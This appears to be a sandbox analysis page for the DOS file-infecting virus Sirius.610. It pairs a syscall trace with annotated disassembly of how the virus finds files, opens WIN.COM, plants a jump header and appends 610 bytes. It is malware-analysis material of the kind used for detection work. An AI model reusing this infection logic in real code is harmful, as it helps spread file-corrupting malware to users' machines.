Sample viewer

vx.netlux.org/Virus.DOS.Sirius.610.c


Syscalls:

Time Syscall Op Syscall Name
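2018-12-17T22:24:15.149673488Z 53 PC: 200cc | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
Note on the 'AKA' labels: the quoted name belongs to the INT 21h function with that number, not to the interrupt vector being read or set. If the vector number is decimal, as the Syscall Op column is, 36 is INT 24h, the DOS critical-error handler. Rows reading or replacing that vector at PC 200cc, 200e0 and 2027e are therefore better read as the sample swapping and later re-setting the critical-error handler; the '34' and '35' rows further down would likewise be INT 22h and INT 23h.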
2018-12-17T22:24:15.150834791Z 37 PC: 200e0 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:24:15.151857066Z 26 PC: 200e7 | Set disk transfer address
2018-12-17T22:24:15.153732047Z 25 PC: 200eb | Get default drive
2018-12-17T22:24:15.154830977Z 71 PC: 200f8 | Get current directory
2018-12-17T22:24:15.157610281Z 14 PC: 2010e | Set default drive (Drive = 'C')
2018-12-17T22:24:15.159192501Z 59 PC: 20298 | Change current directory
; Disassembly excerpt (16-bit, Intel syntax) of the code that runs after the
; 'Get time' call (INT 21h AH=2Ch) returns at 0x20115. It derives one byte
; from the clock, stores it as the first byte of the buffer at [bp + 0x220],
; and passes that buffer to Find First (AH=4Eh) as the search pattern,
; stepping the byte through the alphabet each time the search fails.
; NOTE(review): only the first byte of the pattern is written here; the rest
; of the buffer is not visible in this excerpt.
2018-12-17T22:24:15.162841016Z 44 PC: 20115 | Get time 0x20115: shr dl, 1
0x20117: shr dl, 1
; Get time returns hundredths of a second in DL; the two shifts leave DL / 4,
; and adding 0x40 moves it into the ASCII range that starts at '@'.
0x20119: add dl, 0x40
0x2011c: mov byte ptr [bp + 0x220], dl
; BX = 0, so BH starts at zero and serves as the failed-attempt counter below.
0x20120: sub bx, bx
; 0x20122 is the retry target: Find First with DS:DX -> pattern buffer and
; CX = 0x11 (read-only and directory attribute bits).
0x20122: mov ah, 0x4e
0x20124: lea dx, word ptr [bp + 0x220]
0x20128: mov cx, 0x11
0x2012b: int 0x21
; Carry clear means a match was found: leave the loop for 0x2014a.
0x2012d: jae 0x2014a
; No match: advance the first pattern byte by one, subtracting 0x1a (26) once
; it passes 0x5a ('Z'), and store it back.
0x2012f: mov al, byte ptr [bp + 0x220]
0x20133: inc al
0x20135: cmp al, 0x5a
0x20137: jbe 0x2013b
0x20139: sub al, 0x1a
0x2013b: mov byte ptr [bp + 0x220], al
; Count the failure. After 0x1b (27) failures control goes to 0x200f8, the
; address the trace reports for the 'Get current directory' call; otherwise
; the search is retried with the new byte.
; NOTE(review): the eight 'Find first file' rows at PC 2012d followed by
; 'Change current directory' at PC 20151 are consistent with this loop
; matching on its eighth attempt - confirm against the code at 0x2014a.
0x2013f: inc bh
0x20141: cmp bh, 0x1b
0x20144: je 0x200f8
0x20146: jmp 0x20122
2018-12-17T22:24:15.164844194Z 78 PC: 2012d | Find first file
2018-12-17T22:24:15.171014883Z 78 PC: 2012d | Find first file
2018-12-17T22:24:15.176170358Z 78 PC: 2012d | Find first file
2018-12-17T22:24:15.181319216Z 78 PC: 2012d | Find first file
2018-12-17T22:24:15.186747065Z 78 PC: 2012d | Find first file
2018-12-17T22:24:15.192209442Z 78 PC: 2012d | Find first file
2018-12-17T22:24:15.197528475Z 78 PC: 2012d | Find first file
2018-12-17T22:24:15.203104898Z 78 PC: 2012d | Find first file
2018-12-17T22:24:15.208671469Z 59 PC: 20151 | Change current directory
2018-12-17T22:24:15.217849289Z 78 PC: 2015c | Find first file
2018-12-17T22:24:15.22725427Z 67 PC: 201b8 | Get or set file attributes
2018-12-17T22:24:15.233666912Z 67 PC: 201c5 | Get or set file attributes
2018-12-17T22:24:15.577003461Z 61 PC: 201cd | Open file (Filename = 'WIN.COM')
2018-12-17T22:24:15.58146132Z 87 PC: 201d3 | Get or set file date and time
; Disassembly excerpt (16-bit, Intel syntax) of the code that runs after the
; second 'Get time' call returns at 0x201e6, on the file the trace shows being
; opened as 'WIN.COM'. It saves the file's first three bytes, measures the
; file, and builds a three-byte near JMP (E9 + 16-bit displacement) in a
; buffer at cs:0xfa78. The excerpt ends while a 0x262-byte transfer is being
; set up; the instruction that performs it is not shown.
; NOTE(review): BX (the file handle) is not loaded in this excerpt; the trace
; reports handle 5 for the calls below.
; DX = seconds:hundredths from Get time. A zero value branches back to
; 0x201e2, which is outside this excerpt (presumably the time query is
; repeated - confirm). The non-zero value is kept at [bp + 0x255]; its later
; use is not visible here.
2018-12-17T22:24:15.582784883Z 44 PC: 201e6 | Get time 0x201e6: or dx, dx
0x201e8: je 0x201e2
0x201ea: mov word ptr [bp + 0x255], dx
; INT 21h AH=3Fh: read CX = 3 bytes from the file into [bp + 0x217]
; (trace row: 'Read 3 bytes on handle 5').
0x201ee: mov ah, 0x3f
0x201f0: lea dx, word ptr [bp + 0x217]
0x201f4: mov cx, 3
0x201f7: int 0x21
; INT 21h AX=4202h: move the file pointer relative to end of file with
; offset CX:DX. CX is zeroed; the next instruction is one byte long per the
; addresses, so in 16-bit code it sign-extends AX into DX (cwd), giving
; DX = 0 because AX = 0x4202 is positive. The call therefore returns the
; file length in DX:AX.
0x201f9: mov ax, 0x4202
0x201fc: sub cx, cx
0x201fe: cdq
0x201ff: int 0x21
; AX = file length - 3, stored after an 0xE9 opcode byte: together the bytes
; at cs:0xfa78..0xfa7a form a near JMP whose displacement, taken from file
; offset 3, lands at the original end of file.
; NOTE(review): the later trace rows (write 610 bytes, move file pointer,
; write 3 bytes) are consistent with appended code plus a rewritten 3-byte
; header; for detection, that write pattern bracketed by the attribute and
; date/time calls is the observable behaviour - confirm against 0x2021a on.
0x20201: sub ax, 3
0x20204: mov word ptr cs:[0xfa79], ax
0x20208: mov byte ptr cs:[0xfa78], 0xe9
0x2020e: nop
0x2020f: nop
0x20210: nop
; Source SI = bp - 5, destination DI = 0xfb2c, count CX = 0x262 (610 decimal,
; matching the 'Write 610 bytes' trace row and the sample name).
0x20211: lea si, word ptr [bp - 5]
0x20214: mov di, 0xfb2c
0x20217: mov cx, 0x262
2018-12-17T22:24:15.584208851Z 63 PC: 201f9 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:24:15.588162249Z 66 PC: 20201 | Move file pointer
2018-12-17T22:24:15.590808791Z 64 PC: 2022d | Write file or device (Write 610 bytes on handle 5)
2018-12-17T22:24:15.598888051Z 66 PC: 20235 | Move file pointer
2018-12-17T22:24:15.601097774Z 64 PC: 2023f | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:24:15.608724405Z 87 PC: 20254 | Get or set file date and time
2018-12-17T22:24:15.610334821Z 62 PC: 20258 | Close file
2018-12-17T22:24:15.61679945Z 67 PC: 20265 | Get or set file attributes
2018-12-17T22:24:15.62692116Z 14 PC: 202a2 | Set default drive (Drive = 'A')
2018-12-17T22:24:15.628210035Z 59 PC: 20298 | Change current directory
2018-12-17T22:24:15.632474401Z 59 PC: 202aa | Change current directory
2018-12-17T22:24:15.634627919Z 37 PC: 2027e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:24:15.635633564Z 26 PC: 20286 | Set disk transfer address
2018-12-17T22:24:15.636911928Z 80 PC: 13fb9 | Set current PSP
2018-12-17T22:24:15.637894797Z 48 PC: 13fbe | Get DOS version
2018-12-17T22:24:15.639103224Z 101 PC: 14044 | Get extended country info
2018-12-17T22:24:15.64003944Z 99 PC: 1404a | Get DBCS lead byte table pointer
2018-12-17T22:24:15.641356114Z 74 PC: 140ac | Reallocate memory
2018-12-17T22:24:15.642485421Z 25 PC: 140e3 | Get default drive
2018-12-17T22:24:15.643394318Z 37 PC: 13ba3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-17T22:24:15.645231054Z 37 PC: 13baa | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-17T22:24:15.646148303Z 37 PC: 13bb1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:24:15.648106226Z 2 PC: 13e6c | Character output (Char = '0d')
2018-12-17T22:24:15.650498379Z 2 PC: 13e6c | Character output (Char = '0a')
2018-12-17T22:24:15.652602811Z 2 PC: 13e6c | Character output (Char = '0d')
2018-12-17T22:24:15.653889761Z 2 PC: 13e6c | Character output (Char = '0a')
2018-12-17T22:24:15.656464715Z 2 PC: 13e6c | Character output (Char = '4d')
2018-12-17T22:24:15.657917701Z 2 PC: 13e6c | Character output (Char = '69')
2018-12-17T22:24:15.65938426Z 2 PC: 13e6c | Character output (Char = '63')
2018-12-17T22:24:15.661230679Z 2 PC: 13e6c | Character output (Char = '72')
2018-12-17T22:24:15.662710243Z 2 PC: 13e6c | Character output (Char = '6f')
2018-12-17T22:24:15.664024837Z 2 PC: 13e6c | Character output (Char = '73')
2018-12-17T22:24:15.665776874Z 2 PC: 13e6c | Character output (Char = '6f')
2018-12-17T22:24:15.667266876Z 2 PC: 13e6c | Character output (Char = '66')
2018-12-17T22:24:15.668714355Z 2 PC: 13e6c | Character output (Char = '74')
2018-12-17T22:24:15.670808156Z 2 PC: 13e6c | Character output (Char = '28')
2018-12-17T22:24:15.672332561Z 2 PC: 13e6c | Character output (Char = '52')
2018-12-17T22:24:15.673889483Z 2 PC: 13e6c | Character output (Char = '29')
2018-12-17T22:24:15.676184156Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.67759263Z 2 PC: 13e6c | Character output (Char = '4d')
2018-12-17T22:24:15.678925896Z 2 PC: 13e6c | Character output (Char = '53')
2018-12-17T22:24:15.687804167Z 2 PC: 13e6c | Character output (Char = '2d')
2018-12-17T22:24:15.69080399Z 2 PC: 13e6c | Character output (Char = '44')
2018-12-17T22:24:15.693002215Z 2 PC: 13e6c | Character output (Char = '4f')
2018-12-17T22:24:15.704114096Z 2 PC: 13e6c | Character output (Char = '53')
2018-12-17T22:24:15.706484141Z 2 PC: 13e6c | Character output (Char = '28')
2018-12-17T22:24:15.708830475Z 2 PC: 13e6c | Character output (Char = '52')
2018-12-17T22:24:15.711438322Z 2 PC: 13e6c | Character output (Char = '29')
2018-12-17T22:24:15.713764439Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.716068523Z 2 PC: 13e6c | Character output (Char = '56')
2018-12-17T22:24:15.718336148Z 2 PC: 13e6c | Character output (Char = '65')
2018-12-17T22:24:15.720251788Z 2 PC: 13e6c | Character output (Char = '72')
2018-12-17T22:24:15.722588143Z 2 PC: 13e6c | Character output (Char = '73')
2018-12-17T22:24:15.724820256Z 2 PC: 13e6c | Character output (Char = '69')
2018-12-17T22:24:15.727463984Z 2 PC: 13e6c | Character output (Char = '6f')
2018-12-17T22:24:15.729677873Z 2 PC: 13e6c | Character output (Char = '6e')
2018-12-17T22:24:15.732491871Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.735327305Z 2 PC: 13e6c | Character output (Char = '36')
2018-12-17T22:24:15.737300761Z 2 PC: 13e6c | Character output (Char = '2e')
2018-12-17T22:24:15.739567428Z 2 PC: 13e6c | Character output (Char = '32')
2018-12-17T22:24:15.741509883Z 2 PC: 13e6c | Character output (Char = '32')
2018-12-17T22:24:15.743757017Z 2 PC: 13e6c | Character output (Char = '0d')
2018-12-17T22:24:15.745752834Z 2 PC: 13e6c | Character output (Char = '0a')
2018-12-17T22:24:15.749135607Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.751969542Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.760735426Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.762675888Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.773964246Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.776082465Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.777965928Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.780725648Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.783761048Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.786369207Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.789535126Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.791964615Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.793865965Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.796768504Z 2 PC: 13e6c | Character output (Char = '28')
2018-12-17T22:24:15.799028617Z 2 PC: 13e6c | Character output (Char = '43')
2018-12-17T22:24:15.801153322Z 2 PC: 13e6c | Character output (Char = '29')
2018-12-17T22:24:15.804703829Z 2 PC: 13e6c | Character output (Char = '43')
2018-12-17T22:24:15.806707979Z 2 PC: 13e6c | Character output (Char = '6f')
2018-12-17T22:24:15.808576485Z 2 PC: 13e6c | Character output (Char = '70')
2018-12-17T22:24:15.810994705Z 2 PC: 13e6c | Character output (Char = '79')
2018-12-17T22:24:15.813262974Z 2 PC: 13e6c | Character output (Char = '72')
2018-12-17T22:24:15.815293615Z 2 PC: 13e6c | Character output (Char = '69')
2018-12-17T22:24:15.817808196Z 2 PC: 13e6c | Character output (Char = '67')
2018-12-17T22:24:15.81978264Z 2 PC: 13e6c | Character output (Char = '68')
2018-12-17T22:24:15.821730641Z 2 PC: 13e6c | Character output (Char = '74')
2018-12-17T22:24:15.824093261Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.826403991Z 2 PC: 13e6c | Character output (Char = '4d')
2018-12-17T22:24:15.828767393Z 2 PC: 13e6c | Character output (Char = '69')
2018-12-17T22:24:15.831311759Z 2 PC: 13e6c | Character output (Char = '63')
2018-12-17T22:24:15.833510265Z 2 PC: 13e6c | Character output (Char = '72')
2018-12-17T22:24:15.835471758Z 2 PC: 13e6c | Character output (Char = '6f')
2018-12-17T22:24:15.837689909Z 2 PC: 13e6c | Character output (Char = '73')
2018-12-17T22:24:15.8397405Z 2 PC: 13e6c | Character output (Char = '6f')
2018-12-17T22:24:15.842068706Z 2 PC: 13e6c | Character output (Char = '66')
2018-12-17T22:24:15.844029009Z 2 PC: 13e6c | Character output (Char = '74')
2018-12-17T22:24:15.84596558Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.849892165Z 2 PC: 13e6c | Character output (Char = '43')
2018-12-17T22:24:15.851914149Z 2 PC: 13e6c | Character output (Char = '6f')
2018-12-17T22:24:15.853837278Z 2 PC: 13e6c | Character output (Char = '72')
2018-12-17T22:24:15.85670692Z 2 PC: 13e6c | Character output (Char = '70')
2018-12-17T22:24:15.859478879Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.861273935Z 2 PC: 13e6c | Character output (Char = '31')
2018-12-17T22:24:15.864051387Z 2 PC: 13e6c | Character output (Char = '39')
2018-12-17T22:24:15.866251481Z 2 PC: 13e6c | Character output (Char = '38')
2018-12-17T22:24:15.868299465Z 2 PC: 13e6c | Character output (Char = '31')
2018-12-17T22:24:15.870992073Z 2 PC: 13e6c | Character output (Char = '2d')
2018-12-17T22:24:15.872965707Z 2 PC: 13e6c | Character output (Char = '31')
2018-12-17T22:24:15.875122Z 2 PC: 13e6c | Character output (Char = '39')
2018-12-17T22:24:15.877776005Z 2 PC: 13e6c | Character output (Char = '39')
2018-12-17T22:24:15.879917065Z 2 PC: 13e6c | Character output (Char = '34')
2018-12-17T22:24:15.881876155Z 2 PC: 13e6c | Character output (Char = '2e')
2018-12-17T22:24:15.884510827Z 2 PC: 13e6c | Character output (Char = '0d')
2018-12-17T22:24:15.886627894Z 2 PC: 13e6c | Character output (Char = '0a')
2018-12-17T22:24:15.891849469Z 74 PC: 12d4c | Reallocate memory
2018-12-17T22:24:15.894033572Z 72 PC: 12d8d | Allocate memory
2018-12-17T22:24:15.895442479Z 72 PC: 12dc5 | Allocate memory
2018-12-17T22:24:15.896970265Z 72 PC: 12dcd | Allocate memory